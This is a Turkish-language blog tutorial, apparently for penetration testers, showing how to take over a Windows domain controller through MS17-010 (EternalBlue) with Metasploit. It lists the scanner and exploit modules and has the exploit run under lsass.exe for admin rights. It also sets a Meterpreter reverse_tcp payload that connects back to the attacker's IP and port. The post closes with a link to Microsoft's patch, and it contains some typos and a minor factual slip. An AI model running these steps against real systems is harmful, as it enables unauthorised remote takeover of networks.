MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme


Merhaba,

Öncelikle MS17-010 zafiyeti nedir ? ve nasıl public olmuştur ?

Bu siber saldırının baş rolü olan WannaCry fidye yazılımı, kurbanlarına Microsoft Windows’un SMBv1 sisteminde bulunan ve Microsoft Güvenlik Bülteni MS17-010 kapsamında tanımlanıp kapatılmış olan bir güvenlik açığından faydalanarak bulaşmaktadır. Kullanılan “Eternal Blue” adlı exploit, 14 Nisan 2017‘de ShadowBrokers tarafından NSA‘in hacking araçlarını ifşa etmesiyle ortaya çıkarılmıştır.

Not: Exploit-db üzerinde python dili ile yazılmış exploit mevcuttur, dilerseniz direk metasploit üzerindende çalıştırabilirsiniz.

Uygulama!

Öncelikle "msfconsole" komutu ile son exploitleri download ediyoruz. Ardından ise "msfconsole" komutunu kullanarak metasploit'i çalıştırıyoruz.

Bir sonraki adımda ise "searche ms17-010"  komutunu çalıştırarak ms17-010 exploitinin dizinin aratıyoruz. Burdan sonra ise hedef sistemde zafiyetin false positive oldugunu tespit etmemiz gerekiyor, bundan dolayı use" komutunu kullanarak "auxiliary/scanner/smb/smb_ms17_010"  dizinine gidiyoruz, ardından ise "set RHOSTS <HEDEF_IP>" şeklinde girerek "run" komutunu çalıştırıyoruz. Görüldüğü gibi "Host is likely BULNERABLE to MS17-010!" yazısını gördük ve zafiyetin hedef sistemde oldugunu doğruladık.

Şimdi ise exploiting adımına geldik burada yapmamız gereken "use exploit/windows/smb/ms17_010_eternalblue" dizinine giriyoruz ve "show options" komutu ile detaylı bilgi alıyoruz, "set RHOST <HEDEF_IP>" şeklinde girilir, şimdi ise hedef sisteme girerken admin hakları ile girmek istediğim için "set ProcessName lsass.exe" yazıyoruz lsass.exe windows işletem sistemlerinde admin yetkili processlerden birisidir.  Ardından ise bize bir reverse bağlantı gelmesi için payload girmemiz gerekiyor bunun için" set payload windows/x64/meterpreter/reverse_tcp" komutunu kullanıyoruz yani gelen bağlantı meterpreter satırına düşecektir. Son olarak "set <LHOST SALDIRGAN_IP>" şeklinde local ip adresi girilir "ifconfig" komutu ile görebilirsiniz ve "set LPORT <SALDIRGAN DİNLEME PORTU>" şeklinde girilir. ve son olarak "run" komutu ile exploiting işletmi başlatılır.
Görüldüğü gibi sistemden gelen bağlantı ve ADMIN haklarına sahip olarak domian controller'i ele geçirdik.
Çözüm; https://technet.microsoft.com/en-us/library/security/ms17-010.aspx adresinden update geçebilirsiniz.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Sızma Testi Senaryosu - Bölüm 1

Windows İşletim Sisteminde Yetki Yükseltme - 1